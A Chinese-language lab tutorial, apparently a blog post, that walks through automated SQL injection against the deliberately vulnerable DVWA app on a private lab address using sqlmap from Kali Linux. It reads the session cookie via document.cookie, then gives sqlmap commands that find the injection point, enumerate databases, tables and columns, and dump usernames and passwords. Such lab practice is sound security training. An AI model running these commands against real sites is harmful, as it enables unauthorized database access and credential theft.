这次和上次的文章[MySQL] SQL注入——手工注入一样用到的是DVWA平台和KALI Linux系统
1、首先登陆到DVWA 2、获取PHPSESSID值 这里获取cookie值由两种方法 第一种是控制台获取
document.cookie
第二种就是
3、在user ID输入1 注意:这个网址是有变化的 将这个网址幅值下来 打开KALI Linux
判断当前网页是否存在注入点,如需要登录,通过指定cookie携带PHPSESSION信息,实现预登录 |
sqlmap -u "http://192.168.105.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=**************************" --batch
注意:PHPSESSID=**************************是自己获取的,这里隐藏 出现以上情况标识有注入点
通过自动注入,获取该网页的MySQL服务器中所有数据库名 |
sqlmap -u "http://192.168.105.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=**************************" --batch --dbs
sqlmap -u "http://192.168.105.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=**************************" --batch -D dvwa --tables
获取到了“dvwa”数据库中两个表的表名
sqlmap -u "http://192.168.105.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=**************************" --batch -D dvwa -T users --columns
通过自动注入,获取users表中first_name,last_name,user,password指定字段所有数据内容 |
sqlmap -u " http://192.168.105.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# " --cookie=" security=low; PHPSESSID=************************** " --batch -D dvwa -T users -C first_name,last_name,user,password --dump
|